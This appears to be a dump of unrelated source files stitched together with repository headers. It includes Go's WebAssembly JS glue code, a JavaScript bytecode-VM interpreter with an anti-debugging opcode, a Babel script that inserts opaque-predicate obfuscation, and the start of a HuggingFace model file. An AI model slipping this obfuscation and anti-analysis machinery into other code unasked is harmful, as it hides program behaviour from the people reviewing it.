const getInt64 = (addr) => {
const low = this.mem.getUint32(addr + 0, true);
const high = this.mem.getInt32(addr + 4, true);
return low + high * 4294967296;
}
const loadValue = (addr) => {
const f = this.mem.getFloat64(addr, true);
if (f === 0) {
return undefined;
}
if (!isNaN(f)) {
return f;
}
const id = this.mem.getUint32(addr, true);
return this._values[id];
}
const storeValue = (addr, v) => {
const nanHead = 0x7FF80000;
if (typeof v === "number" && v !== 0) {
if (isNaN(v)) {
this.mem.setUint32(addr + 4, nanHead, true);
this.mem.setUint32(addr, 0, true);
return;
}
this.mem.setFloat64(addr, v, true);
return;
}
if (v === undefined) {
this.mem.setFloat64(addr, 0, true);
return;
}
let id = this._ids.get(v);
if (id === undefined) {
id = this._idPool.pop();
if (id === undefined) {
id = this._values.length;
}
this._values[id] = v;
this._goRefCounts[id] = 0;
this._ids.set(v, id);
}
this._goRefCounts[id]++;
let typeFlag = 0;
switch (typeof v) {
case "object":
if (v !== null) {
typeFlag = 1;
}
break;
case "string":
typeFlag = 2;
break;
case "symbol":
typeFlag = 3;
break;
case "function":
typeFlag = 4;
break;
}
this.mem.setUint32(addr + 4, nanHead | typeFlag, true);
this.mem.setUint32(addr, id, true);
}
const loadSlice = (addr) => {
const array = getInt64(addr + 0);
const len = getInt64(addr + 8);
return new Uint8Array(this._inst.exports.mem.buffer, array, len);
}
const loadSliceOfValues = (addr) => {
const array = getInt64(addr + 0);
const len = getInt64(addr + 8);
const a = new Array(len);
for (let i = 0; i < len; i++) {
a[i] = loadValue(array + i * 8);
}
return a;
}
const loadString = (addr) => {
const saddr = getInt64(addr + 0);
const len = getInt64(addr + 8);
return decoder.decode(new DataView(this._inst.exports.mem.buffer, saddr, len));
}
const timeOrigin = Date.now() - performance.now();
this.importObject = {
_gotest: {
add: (a, b) => a + b,
},
gojs: {
// Go's SP does not change as long as no Go code is running. Some operations (e.g. calls, getters and setters)
// may synchronously trigger a Go event handler. This makes Go code get executed in the middle of the imported
// function. A goroutine can switch to a new stack if the current stack is too small (see morestack function).
// This changes the SP, thus we have to update the SP used by the imported function.
// func wasmExit(code int32)
"runtime.wasmExit": (sp) => {
sp >>>= 0;
const code = this.mem.getInt32(sp + 8, true);
this.exited = true;
delete this._inst;
delete this._values;
delete this._goRefCounts;
delete this._ids;
delete this._idPool;
this.exit(code);
},
// func wasmWrite(fd uintptr, p unsafe.Pointer, n int32)
"runtime.wasmWrite": (sp) => {
sp >>>= 0;
const fd = getInt64(sp + 8);
const p = getInt64(sp + 16);
const n = this.mem.getInt32(sp + 24, true);
fs.writeSync(fd, new Uint8Array(this._inst.exports.mem.buffer, p, n));
},
// func resetMemoryDataView()
"runtime.resetMemoryDataView": (sp) => {
sp >>>= 0;
this.mem = new DataView(this._inst.exports.mem.buffer);
},
// func nanotime1() int64
"runtime.nanotime1": (sp) => {
sp >>>= 0;
setInt64(sp + 8, (timeOrigin + performance.now()) * 1000000);
},
// func walltime() (sec int64, nsec int32)
"runtime.walltime": (sp) => {
sp >>>= 0;
const msec = (new Date).getTime();
setInt64(sp + 8, msec / 1000);
this.mem.setInt32(sp + 16, (msec % 1000) * 1000000, true);
},
// func scheduleTimeoutEvent(delay int64) int32
"runtime.scheduleTimeoutEvent": (sp) => {
sp >>>= 0;
const id = this._nextCallbackTimeoutID;
this._nextCallbackTimeoutID++;
this._scheduledTimeouts.set(id, setTimeout(
() => {
this._resume();
while (this._scheduledTimeouts.has(id)) {
// for some reason Go failed to register the timeout event, log and try again
// (temporary workaround for https://github.com/golang/go/issues/28975)
console.warn("scheduleTimeoutEvent: missed timeout event");
this._resume();
}
},
getInt64(sp + 8),
));
this.mem.setInt32(sp + 16, id, true);
},
// func clearTimeoutEvent(id int32)
"runtime.clearTimeoutEvent": (sp) => {
sp >>>= 0;
const id = this.mem.getInt32(sp + 8, true);
clearTimeout(this._scheduledTimeouts.get(id));
this._scheduledTimeouts.delete(id);
},
// func getRandomData(r []byte)
"runtime.getRandomData": (sp) => {
sp >>>= 0;
crypto.getRandomValues(loadSlice(sp + 8));
},
// func finalizeRef(v ref)
"syscall/js.finalizeRef": (sp) => {
sp >>>= 0;
const id = this.mem.getUint32(sp + 8, true);
this._goRefCounts[id]--;
if (this._goRefCounts[id] === 0) {
const v = this._values[id];
this._values[id] = null;
this._ids.delete(v);
this._idPool.push(id);
}
},
// func stringVal(value string) ref
"syscall/js.stringVal": (sp) => {
sp >>>= 0;
storeValue(sp + 24, loadString(sp + 8));
},
// func valueGet(v ref, p string) ref
"syscall/js.valueGet": (sp) => {
sp >>>= 0;
const result = Reflect.get(loadValue(sp + 8), loadString(sp + 16));
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 32, result);
},
// func valueSet(v ref, p string, x ref)
"syscall/js.valueSet": (sp) => {
sp >>>= 0;
Reflect.set(loadValue(sp + 8), loadString(sp + 16), loadValue(sp + 32));
},
// func valueDelete(v ref, p string)
"syscall/js.valueDelete": (sp) => {
sp >>>= 0;
Reflect.deleteProperty(loadValue(sp + 8), loadString(sp + 16));
},
// func valueIndex(v ref, i int) ref
"syscall/js.valueIndex": (sp) => {
sp >>>= 0;
storeValue(sp + 24, Reflect.get(loadValue(sp + 8), getInt64(sp + 16)));
},
// valueSetIndex(v ref, i int, x ref)
"syscall/js.valueSetIndex": (sp) => {
sp >>>= 0;
Reflect.set(loadValue(sp + 8), getInt64(sp + 16), loadValue(sp + 24));
},
// func valueCall(v ref, m string, args []ref) (ref, bool)
"syscall/js.valueCall": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const m = Reflect.get(v, loadString(sp + 16));
const args = loadSliceOfValues(sp + 32);
const result = Reflect.apply(m, v, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 56, result);
this.mem.setUint8(sp + 64, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 56, err);
this.mem.setUint8(sp + 64, 0);
}
},
// func valueInvoke(v ref, args []ref) (ref, bool)
"syscall/js.valueInvoke": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const args = loadSliceOfValues(sp + 16);
const result = Reflect.apply(v, undefined, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, result);
this.mem.setUint8(sp + 48, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, err);
this.mem.setUint8(sp + 48, 0);
}
},
// func valueNew(v ref, args []ref) (ref, bool)
"syscall/js.valueNew": (sp) => {
sp >>>= 0;
try {
const v = loadValue(sp + 8);
const args = loadSliceOfValues(sp + 16);
const result = Reflect.construct(v, args);
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, result);
this.mem.setUint8(sp + 48, 1);
} catch (err) {
sp = this._inst.exports.getsp() >>> 0; // see comment above
storeValue(sp + 40, err);
this.mem.setUint8(sp + 48, 0);
}
},
// func valueLength(v ref) int
"syscall/js.valueLength": (sp) => {
sp >>>= 0;
setInt64(sp + 16, parseInt(loadValue(sp + 8).length));
},
// valuePrepareString(v ref) (ref, int)
"syscall/js.valuePrepareString": (sp) => {
sp >>>= 0;
const str = encoder.encode(String(loadValue(sp + 8)));
storeValue(sp + 16, str);
setInt64(sp + 24, str.length);
},
// valueLoadString(v ref, b []byte)
"syscall/js.valueLoadString": (sp) => {
sp >>>= 0;
const str = loadValue(sp + 8);
loadSlice(sp + 16).set(str);
},
// func valueInstanceOf(v ref, t ref) bool
"syscall/js.valueInstanceOf": (sp) => {
sp >>>= 0;
this.mem.setUint8(sp + 24, (loadValue(sp + 8) instanceof loadValue(sp + 16)) ? 1 : 0);
},
// func copyBytesToGo(dst []byte, src ref) (int, bool)
"syscall/js.copyBytesToGo": (sp) => {
sp >>>= 0;
const dst = loadSlice(sp + 8);
const src = loadValue(sp + 32);
if (!(src instanceof Uint8Array || src instanceof Uint8ClampedArray)) {
this.mem.setUint8(sp + 48, 0);
return;
}
const toCopy = src.subarray(0, dst.length);
dst.set(toCopy);
setInt64(sp + 40, toCopy.length);
this.mem.setUint8(sp + 48, 1);
},
// func copyBytesToJS(dst ref, src []byte) (int, bool)
"syscall/js.copyBytesToJS": (sp) => {
sp >>>= 0;
const dst = loadValue(sp + 8);
const src = loadSlice(sp + 16);
if (!(dst instanceof Uint8Array || dst instanceof Uint8ClampedArray)) {
this.mem.setUint8(sp + 48, 0);
return;
}
const toCopy = src.subarray(0, dst.length);
dst.set(toCopy);
setInt64(sp + 40, toCopy.length);
this.mem.setUint8(sp + 48, 1);
},
"debug": (value) => {
console.log(value);
},
}
};
}
async run(instance) {
if (!(instance instanceof WebAssembly.Instance)) {
throw new Error("Go.run: WebAssembly.Instance expected");
}
this._inst = instance;
this.mem = new DataView(this._inst.exports.mem.buffer);
this._values = [ // JS values that Go currently has references to, indexed by reference id
NaN,
0,
null,
true,
false,
globalThis,
this,
];
this._goRefCounts = new Array(this._values.length).fill(Infinity); // number of references that Go has to a JS value, indexed by reference id
this._ids = new Map([ // mapping from JS values to reference ids
[0, 1],
[null, 2],
[true, 3],
[false, 4],
[globalThis, 5],
[this, 6],
]);
this._idPool = []; // unused ids that have been garbage collected
this.exited = false; // whether the Go program has exited
// Pass command line arguments and environment variables to WebAssembly by writing them to the linear memory.
let offset = 4096;
const strPtr = (str) => {
const ptr = offset;
const bytes = encoder.encode(str + "\0");
new Uint8Array(this.mem.buffer, offset, bytes.length).set(bytes);
offset += bytes.length;
if (offset % 8 !== 0) {
offset += 8 - (offset % 8);
}
return ptr;
};
const argc = this.argv.length;
const argvPtrs = [];
this.argv.forEach((arg) => {
argvPtrs.push(strPtr(arg));
});
argvPtrs.push(0);
const keys = Object.keys(this.env).sort();
keys.forEach((key) => {
argvPtrs.push(strPtr(`${key}=${this.env[key]}`));
});
argvPtrs.push(0);
const argv = offset;
argvPtrs.forEach((ptr) => {
this.mem.setUint32(offset, ptr, true);
this.mem.setUint32(offset + 4, 0, true);
offset += 8;
});
// The linker guarantees global data starts from at least wasmMinDataAddr.
// Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
const wasmMinDataAddr = 4096 + 8192;
if (offset >= wasmMinDataAddr) {
throw new Error("total length of command line and environment variables exceeds limit");
}
this._inst.exports.run(argc, argv);
if (this.exited) {
this._resolveExitPromise();
}
await this._exitPromise;
}
_resume() {
if (this.exited) {
throw new Error("Go program has already exited");
}
this._inst.exports.resume();
if (this.exited) {
this._resolveExitPromise();
}
}
_makeFuncWrapper(id) {
const go = this;
return function () {
const event = { id: id, this: this, args: arguments };
go._pendingEvent = event;
go._resume();
return event.result;
};
}
}
})();
|
2833844911/cy_jsvmp | 19,519 | tool/jsvmp_outcs.js | function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
window._fetch = window.fetch
function cbb_jsvmp(all, duei, start, shuz,argsList, ogg, op) {
function getproto(s,d,e){
let dt = s;
for ( ;1==1;){
if (s.hasOwnProperty(d)){
try{
s[d] = e
}catch(e2){
this[d] = e
return
}
break
}else{
s = s.__proto__
if (s == undefined || s==null){
window[d] = e
return
}else{
a9 =9
}
}
}
}
if (op !==undefined){
var allthis
allthis = op['allthis']
duei = op.duei
all = op.all
shuz = op.shuz
argsList = op.argsList
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i ;
a7 = op.a7
var args = op.args
var cbbb = op.cbbb;
}else{
var allthis
if (ogg !== undefined){
allthis = ogg
}else{
allthis = all
}
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i;
var args = []
var cbbb = all;
}
CbbCs(duei, [duei.push, duei.pop, duei.shift, duei.sf])
Cbb([], [])
while (!![]) {
let s_cbb = shuz[start++];
switch(s_cbb){
case 23:
all = cbbb
a1 = duei.push(cbbb)
break
case 47:
a2 = duei.push(allthis)
break
case 36:
a1 = duei.pop(cbbb)
a2 = duei.pop(a1)
a1 = a2 <= a1;
a5 = duei.push(a1)
break
case 37:
a1 = duei.pop(a4)
a2 = duei.pop(a1)
a1 = a2 >= a1;
a2 = duei.push(a1)
break
case 38:
a1 = duei.pop(a3)
a2 = duei.pop(a3)
a1 = a2 > a1;
a2 = duei.push(a1)
break
case 39:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 == a1;
a4 = duei.push(a1)
break
case 48:
(function (){
a1 = shuz[start++] * 2
a3 = []
a4 = []
for (a2=0; a2< a1;a2++){
if (a2 < a1/2){
a3.splice(0,0,duei.pop())
}else{
a4.splice(0,0,duei.pop())
}
}
a1 = duei.pop(a2)
for (a2=0; a2 < a3.length; a2++){
if (a4[a2] == a1){
start += a3[a2]
break
}
else if (a4[a2] == null){
start += a3[a2]
break
}else {
a9 = 10;
}
}
})()
break
case 53:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 === a1;
a3 = duei.push(a1)
break
case 54:
a1 = duei.pop(a5)
a2 = duei.pop(a6)
a1 = a2 !== a1;
a1 = duei.push(a1)
break
case 550:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 != a1;
duei.push(a1)
break
case 551:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a1 = a2 in a1;
a1 = duei.push(a1)
break
case 22:
a1 = shuz[start++]
a2 = duei.pop(a3)
a3 = duei.pop(a1)
a2[constantPool[a1]] = a3
break
case 19:
a1 = duei.pop(a4)
a2 = duei.pop(a5)
a1 = a2 - a1;
a6 = duei.push(a1)
break
case 291:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 - a1;
a1 = duei.push(a1)
break
case 20:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 + a1;
a1 = duei.push(a1)
break
case 24:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a1 = a2 < a1;
a1 = duei.push(a1)
break
case 240:
a1 = duei.pop(a5)
a2 = duei.pop(a9)
a1 = a2 < a1;
a6 = duei.push(a1)
break
case 27:
a1 = duei.pop(a5)
a2 = duei.pop(a6)
a1 = a2 * a1;
a7 = duei.push(a1)
break
case 28:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 % a1;
a5 = duei.push(a1)
break
case 29:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 ^ a1;
a5 = duei.push(a1)
break
case 30:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 / a1;
a3 = duei.push(a1)
break
case 194:
(function (){
debugger;
})()
break
case 25:
a1 = duei.pop(a6)
a2 = shuz[start++]
if (!a1) {
start += a2;
}else {
a9 = 10;
}
;break
case 31:
a1 = duei.pop(a3)
a2 = duei.pop(a2)
a1 = a2 << a1;
a1 = duei.push(a1)
break
case 32:
a1 = duei.pop(a6)
a2 = duei.pop(a7)
a1 = a2 | a1;
a8 = duei.push(a1)
break
case 26:
a1 = duei.pop(a9)
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] += 1
break
case 190:
a1 = shuz[start++]
start += a1
break
case 192:
a1 = duei.pop(a2)
a3 = shuz[start++]
if (a1) {
start += a3
}else {
a9 = 9
}
break
case 33:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 >> a1;
a5 = duei.push(a1)
break
case 34:
a1 = duei.pop(a6 )
a2 = duei.pop(a1)
a1 = a2 >>> a1;
a2 = duei.push(a1)
break
case 52:
a1 = duei.pop(a3 )
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] -= 1
break
case 104:
a1 = duei.push({})
break
case 105:
a2 = duei.push([])
break
case 57:
(function (){
i = []
a3 = shuz[start++]
a2 = duei.pop(a2)
for (a1 in a2){
i.push(a1)
}
cbbb['for_in_xh_cbb_list'+a3] = i
})()
break
case 51:
a1 = duei.pop(a3)
a2 = shuz[start++]
if (!a1) {
start += a2;
a4 = duei.push(a1)
}else {
a9 = 10;
}
;break
case 252:
a1 = duei.pop(a5)
a2 = shuz[start++]
if (a1) {
start += a2;
a7 = duei.push(a1)
}else {
a9 = 10;
}
;break
case 195:
a2 = shuz[start++]
a3 = shuz[start++]
a4 = shuz[start++]
try{
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
start = a2+start;
if (a6 == "-90_cbb"){
return a6
}
}catch(e){
a7 = e
start = a2+start;
a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"args":args,
"argsList":argsList,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
}finally{
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
start = a3+start;
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
start =start+ a4
}
break
case 35:
a1 = duei.pop(a2)
a2 = duei.pop(a3)
a1 = a2 & a1;
a3 = duei.push(a1)
break
case 8:
a1 = shuz[start++]
a2 = shuz[start++]
a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
a4 = duei.push(a1)
break
case 10:
a1 = shuz[start++]
a2 = duei.push(constantPool[a1])
break
case 11:
a1 = shuz[start++]
a2 = duei.push(a1)
break
case 58:
(function (){
a1 = duei.pop(a2)
throw a1
})()
break
case 40:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a2.push(a1);
a1 = duei.push(a2)
break
case 1:
a8 = duei.length
for (a1=0; a1< a8; a1++){
a7 = duei.pop(a1)
let g = a7
all[g] = function(){
let g2 = new cshduei()
var huuuu = this
if (offnew == 1){
offnew=0
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
return huuuu
}else{
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a9.__proto__ = cbbb
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
}
if (g2.length == 0){
return undefined
}else{
let h = g2.pop(a1)
for (;1==1;){
if (g2.length == 0){
break
}else{
a9 = g2.pop(a1)
}
}
return h
}
}
}
break
case 2:
(function (){
a1 = duei.length
for (a2 = 0; a2 < a1; a2++)
a9 = duei.shift(a2),argsList[a2]!=undefined ? cbbb[a9] = argsList[a2]:a3 = argsList[a2];
})()
break
case 90:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a3 = duei.pop(a5)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 290:
a1 = duei.pop(a5)
a2 = duei.pop(a3)
a3 = duei.pop(a1)
// a3[a2] = a1;
// getproto(a2,a1,a3)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 44:
a5 = duei.pop(a3)
a1 = duei.push(~a5)
break
case 49:
a5 = duei.pop(a3)
a1 = duei.push(typeof a5)
break
case 50:
a5 = duei.pop(a2)
a2 = duei.push(- a5)
break
case 45:
a1 = duei.pop(a2)
a2 = duei.pop(a3)
a3 = duei.pop(a4)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
a1 = duei.push(a3)
break
case 55:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a3 = delete a2[a1];
a1 = duei.push(a3)
break
case 56:
a5 = duei.pop(a1)
a2 = duei.push(void a5)
break
case 60:
a5 = duei.pop(a3)
a4 = duei.push(!a5)
break
case 197:
j = duei.pop(a1)
j2 = duei.pop(a2)
// j2[j] = a1
// getproto(j2,j,a1)
if (j2.variablePool != undefined){
getproto(j2,j,a7)
}else{
j2[j] = a1
}
break
case 46:
(function () {
cbbb['for_in_xh_cbb_list'] = i
a1 = shuz[start++]
a3 = duei.pop(a5)
args = []
for (a2 = 0; a2 < a1; a2++) {
args.splice(0, 0, duei.pop(a6))
}
offnew = 1
if (a3 == RegExp) {
a4 = new RegExp(args[0], args[1])
} else {
a4 = new a3(...args)
}
offnew = 0
a1 = duei.push(a4)
})()
break
case 150:
(function (){
a1 = shuz[start++]
a3 = duei.pop(a5)
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop(a6))
}
let found = false;
for (let key of Object.getOwnPropertyNames(window)) {
if (typeof window[key] === 'function' && a3 === window[key]) {
a4 = window[key](...args)
found = true;
break;
}
}
if (!found) {
a4 = a3.apply(all, args)
}
a2 = duei.push(a4)
})()
break
case 181:
(function (){
a1 = duei.pop(a2);
a2 = duei.pop(a3);
try{
a1 = a2[a1]
}catch(e){
a1 = window[a1]
}
// if (a2 == window && a1==undefined){
// throw new Error("")
// }
all = a2
a1 = duei.push(a1)
})()
break
case 1810:
a1 = duei.pop(a2);
break
case 1811:
a1 = duei.pop(a2)
a2 = duei.pop(a4)
a1 = a2 instanceof a1;
a7 = duei.push(a1)
break
case 200:
return
default:
return "-90_cbb"
}
}
}
if (!this.window){var window = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};window.__proto__=global;}
offnew = 0
window['variablePool'] = {}
window['zhili'] = []
cltothis(window['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(window['zhili'], changlc.awcbb_yhh_fun0.zhili)
cbb_jsvmp( window, new cshduei(), 0, changlc.awcbb_yhh_fun0.zhili)
|
2833844911/cy_jsvmp | 6,986 | tool/pswitch.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
//混乱数组
function RandDataArray(data) {
//混乱准备
var dataTemp = [].concat(data);
var dataBuffer = [];
var length = dataTemp.length;
//混乱数据
var randCount = 0;
var position = 0;
do {
var randvalue = (((length - randCount) - 1) + 1);
position = Math.floor(Math.random() * randvalue);
dataBuffer.push(dataTemp[position]);
randCount++;
dataTemp[position] = dataTemp[length - randCount];
} while (randCount < length);
return dataBuffer;
}
iftrueData2 = `
if (typeof document.all == "undefined"){
}else{
}
if (typeof document.all == "undefined"){
}else{
}
if (window.btoa("1234") == "MTIzNA=="){
}else {
}
`
iffalseDate2 = `
if (typeof document.all == "object"){
}else{
}
if (!navigator.appName){
}else{
}
`
function randomUnmber(start, end){
let data = Math.ceil(Math.random() * end) + start;
return data;
}
function hljiamshuz(data){
if (Math.random() * 10 < 98){
if (typeof data.value == typeof []){
data.value = data.value[0]
}
return {"data": data, "zx":[]}
}
let trueFalseList = [];
let qiant = Math.ceil(Math.random() * 2 );
let unqiant = Math.ceil(Math.random() * 2 );
for (let i = 0; i < qiant; i++){
trueFalseList.push(1)
}
for (let i = 0; i < unqiant; i++){
trueFalseList.push(-1)
}
trueFalseList = RandDataArray(trueFalseList);
let zxshuz = []
for (let i = 0; i < trueFalseList.length; i++){
iftrueData = parser.parse(iftrueData2)
iftrueData = iftrueData.program.body
iffalseDate = parser.parse(iffalseDate2)
iffalseDate = iffalseDate.program.body
if (trueFalseList[i] == 1){
let df = iftrueData[randomUnmber(0, iftrueData.length-1)]
let jianqNumber = Math.ceil(Math.random() * 2) + 1
data.value -= jianqNumber
let y = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(jianqNumber)))
df.consequent.body.push(y);
let y2 = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(Math.ceil(Math.random() * 4) + 1)))
df.alternate.body.push(y2);
zxshuz.push(df);
}else if (trueFalseList[i] == -1){
let df = iffalseDate[randomUnmber(0, iffalseDate.length-1)]
let jianqNumber = Math.ceil(Math.random() * 2) + 1
data.value -= jianqNumber
let y = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(jianqNumber)))
df.alternate.body.push(y);
let y2 = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(Math.ceil(Math.random() * 4) + 1)))
df.consequent.body.push(y2);
zxshuz.push(df);
}
}
return {"data": data, "zx":zxshuz};
}
// 构建躯体
function gitBody(data){
var body = tee.expressionStatement(tee.callExpression(tee.functionExpression(null,[],tee.blockStatement(
data
)), []))
return body;
}
//顺序数组
var shengxu = [];
// 创建字典并初始值, 可在执行后插入代码;
function createDict(args, body, bodyNode){
let medata = [];
let start = shengxu.length
let dyb = {}
let ifel = [];
let gyhhu = []
for (let i2 = 0; i2 < body.length; i2++){
shengxu.push(body[i2])
}
for (let i = 0; i < args.length; i++){
let data = {
key : tee.identifier("oo"+ i) ,
value: args[i]
}
let gh = hljiamshuz(data)
// medata.push(tee.objectProperty(tee.identifier("oo"+i),tee.NumericLiteral(gh['data'].value)))
gyhhu.push(["oo"+i,tee.NumericLiteral(gh['data'].value) ])
dyb[args[i]] = gh['data'].key
ifel = ifel.concat(gh['zx'])
}
data2 = {
key : tee.identifier("oost"),
value: start
}
let gh2 = hljiamshuz(data2)
// medata.push(tee.objectProperty(tee.identifier("oost"), tee.NumericLiteral(gh2['data'].value)))
gyhhu.push(["oost",tee.NumericLiteral(gh2['data'].value)])
dyb["start"] = gh2['data'].key
let gh = ifel.concat(gh2['zx'])
// let data = tee.variableDeclaration("var", [tee.variableDeclarator(
// tee.identifier("cbb_hx1"), tee.objectExpression(medata)
// )])
// let gh = [data].concat(ifel)
for (let i =0; i < gyhhu.length; i++){
data = tee.variableDeclaration("var", [tee.variableDeclarator(
tee.identifier(gyhhu[i][0]), gyhhu[i][1]
)])
gh = [data].concat(gh)
}
gh.push(bodyNode)
let body2 = gitBody(gh)
return {"e":body2, "e2":dyb};
}
// pp = createDict([10,22,33], [2,5,8,6])
// let u = generator(pp).code
// console.log(u);
let parseData = {
CallExpression(path){
if (path.node.callee.name == "Cbb"){
var trueList = []
var falseList = []
for (let i=0; i< path.node.arguments[0].elements.length; i++){
trueList.push("if ("+ path.node.arguments[0].elements[i].value+ "){}else{};")
}
for (let i=0; i< path.node.arguments[1].elements.length; i++){
falseList.push("if ("+ path.node.arguments[1].elements[i].value+ "){}else{};")
}
var funPath = path.findParent((p)=>p.isFunctionDeclaration());
var mg = [];
let shuz = []
var leme = [];
var leme2 = [];
funPath.traverse({
NumericLiteral(path2){
let gh = path2.findParent((p)=>p.isFunctionDeclaration());
if (funPath == gh){
leme.push([path2.node.value, path2])
leme2.push([path2.node.value])
}
}
})
funPath.replaceInline(tee.assignmentExpression("=", tee.identifier(funPath.node.id.name), tee.functionExpression(null,funPath.node.params, funPath.node.body)))
var hui = createDict(leme2,shuz, funPath.node);
for (let i = 0; i< leme.length; i++){
leme[i][1].replaceInline( hui["e2"][leme[i][0]])
}
funPath.replaceInline(hui["e"])
funPath.skip()
path.remove();
}
}
}
let data = fs.readFileSync('./outsrc/out3.js') + ''
let ast = parser.parse(data)
traverse(ast, parseData)
let wmhans = "var shengxu = "+JSON.stringify(shengxu)+";\n"+
`
function cbbfuntome(a){
var i = shengxu[a.cbb];
a.cbb += 1
return i;
};\n
`
let u =wmhans+ generator(ast,{
// compact:true
}).code
fs.writeFileSync("./outsrc/out2.js", u, (e)=>{})
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,400 | src/transformers/models/decision_transformer/modeling_decision_transformer.py | # coding=utf-8
# Copyright 2022 The HuggingFace Team The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch DecisionTransformer model."""
import math
import os
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.cuda.amp import autocast
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutputWithPastAndCrossAttentions
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import Conv1D, find_pruneable_heads_and_indices, prune_conv1d_layer
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_decision_transformer import DecisionTransformerConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "edbeeching/decision-transformer-gym-hopper-medium"
_CONFIG_FOR_DOC = "DecisionTransformerConfig"
DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = [
"edbeeching/decision-transformer-gym-hopper-medium",
# See all DecisionTransformer models at https://huggingface.co/models?filter=decision_transformer
]
# Copied from transformers.models.gpt2.modeling_gpt2.load_tf_weights_in_gpt2
def load_tf_weights_in_gpt2(model, config, gpt2_checkpoint_path):
"""Load tf checkpoints in a pytorch model"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(gpt2_checkpoint_path)
logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
